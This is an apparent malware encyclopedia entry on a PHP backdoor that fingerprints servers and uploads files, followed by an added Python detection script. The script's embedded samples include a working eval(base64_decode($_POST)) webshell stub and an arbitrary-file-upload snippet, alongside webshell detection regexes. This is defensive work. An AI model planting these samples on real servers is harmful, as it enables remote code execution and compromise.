
Backdoor:PHP/Shell.A


First posted on 05 January 2012.
Source: Microsoft

Aliases :

Backdoor:PHP/Shell.A is also known as HTML/Iframe (AhnLab), PHP/BackDoor (AVG), Trojan.PHPInfo.A (Avira), PHP.BackDoor.9 (BitDefender), HTML/Iframe.B.Gen (ESET), Backdoor.PHP.Agent.hc (Kaspersky), Backdoor.Script.PHP.fr (Rising AV), Mal/PHPInfo-A (Sophos), PHP.Backdoor.Trojan (Symantec).

Explanation :

Backdoor:PHP/Shell.A is a Hypertext Preprocessor (.PHP) script that is used to compromise a server running a vulnerable PHP application. Once compromised, information is returned to a remote attacker via the script execution request.

Installation
In a typical attack scenario, a remote attacker uses an injection vulnerability present in the target server's PHP application to execute the malicious PHP script. Upon successfully attacking the server, the trojan script sends a confirmation message to the attacker such as "<name> was here", where "<name>" was observed to be any one of the following:

  • 0sirys
  • raCrew
  • 1x33x7


Payload
Communicates with a remote attacker
If the attack sequence is successful, the attacked server returns various details about itself to the attacker, such as the following:
  • Description and version of the operating system that PHP is running within
  • User ID that PHP is running as
  • Free, used, and total disk space of the drive (current volume) on which PHP is running


Uploads arbitrary files
Some variants of this threat allow the attacker to upload arbitrary files.
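As an added example (not part of the Microsoft write-up and not the malware itself), the following Python triage script searches PHP files for the behaviour the Installation and Payload sections describe: the "<name> was here" banner with the three observed tags, the calls that would produce the OS, user-ID and disk-space details, and upload capability. Its regexes, scoring thresholds, the eval(base64_decode()) check for packed variants (a general webshell concern the page itself does not report) and the three embedded sample scripts are this example's own assumptions, constructed for illustration.

```python
"""Static triage for PHP files showing the behaviour this page describes:
a "<name> was here" banner, server fingerprinting (OS, user ID, disk space)
and optional arbitrary file upload. Added example, not Microsoft's analysis
tooling; the regexes and scoring below are this example's assumptions."""
import os
import re
import sys

# Attacker tags the page reports in the "<name> was here" confirmation message.
KNOWN_TAGS = ("0sirys", "raCrew", "1x33x7")

# PHP calls that yield the details the page says are returned to the attacker.
OS_FINGERPRINT = re.compile(r"\bphp_uname\s*\(", re.I)
USER_ID = re.compile(r"\b(?:get_current_user|getmyuid|posix_getuid|posix_geteuid)\s*\(", re.I)
DISK_SPACE = re.compile(r"\bdisk_(?:free|total)_space\s*\(", re.I)
# Upload capability reported for some variants.
UPLOAD = re.compile(r"\bmove_uploaded_file\s*\(|\$_FILES\b", re.I)
# Generic banner; catches tags the page did not list.
WAS_HERE = re.compile(r"([A-Za-z0-9_]+)\s+was\s+here", re.I)
# Assumption: packed variants hide the calls above behind eval(); flag the wrapper itself.
OBFUSCATION = re.compile(
    r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)


def triage_php(source: str) -> dict:
    """Return the indicators found in one PHP file's text plus a verdict."""
    lowered = source.lower()
    found = {
        "known_tag": [t for t in KNOWN_TAGS if f"{t} was here".lower() in lowered],
        "was_here": sorted({m.group(1) for m in WAS_HERE.finditer(source)}),
        "os_fingerprint": bool(OS_FINGERPRINT.search(source)),
        "user_id": bool(USER_ID.search(source)),
        "disk_space": bool(DISK_SPACE.search(source)),
        "upload": bool(UPLOAD.search(source)),
        "obfuscated": bool(OBFUSCATION.search(source)),
    }
    hits = sum((found["os_fingerprint"], found["user_id"], found["disk_space"]))
    if found["known_tag"] or (found["was_here"] and hits >= 2):
        verdict = "backdoor"      # banner plus fingerprinting is the page's signature
    elif hits == 3 or found["obfuscated"] or (found["upload"] and hits >= 1):
        verdict = "suspicious"    # could be an admin status page; needs a human look
    else:
        verdict = "clean"
    return {**found, "fingerprint_hits": hits, "verdict": verdict}


def scan_tree(root: str) -> list:
    """Walk a document root and return (path, verdict) for every non-clean PHP file."""
    flagged = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".php", ".phtml", ".php5")):
                path = os.path.join(dirpath, name)
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    result = triage_php(fh.read())
                if result["verdict"] != "clean":
                    flagged.append((path, result["verdict"]))
    return flagged


# Constructed samples (not the real malware): one mirrors the behaviour the
# page describes, one is a legitimate upload handler, one is an eval-packed stub.
SAMPLE_SHELL = r"""<?php
echo "0sirys was here<br>";
echo php_uname() . "<br>";
echo get_current_user() . "<br>";
echo disk_free_space("/") . " / " . disk_total_space("/");
if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); }
"""
SAMPLE_BENIGN = r"""<?php
$target = '/var/www/uploads/' . basename($_FILES['doc']['name']);
if (move_uploaded_file($_FILES['doc']['tmp_name'], $target)) { echo 'saved'; }
"""
SAMPLE_PACKED = r"""<?php eval(base64_decode($_POST['p'])); """

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, verdict in scan_tree(sys.argv[1]):
            print(f"{verdict:10} {path}")
    else:
        for label, src in (("shell", SAMPLE_SHELL), ("benign", SAMPLE_BENIGN), ("packed", SAMPLE_PACKED)):
            print(label, triage_php(src)["verdict"])
```

Run it as `python triage.py /var/www` to list non-clean files, or with no argument to triage the embedded samples. A hit on one of the three listed tags is treated as decisive; the fingerprint trio alone is only "suspicious", because a legitimate server status page can call the same functions, so review such hits by hand. The regexes match plain-text calls only, which is why the eval-wrapper check exists: a packed variant shows none of the page's indicators until it is decoded.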



Analysis by Chris Stubbs

Last update 05 January 2012
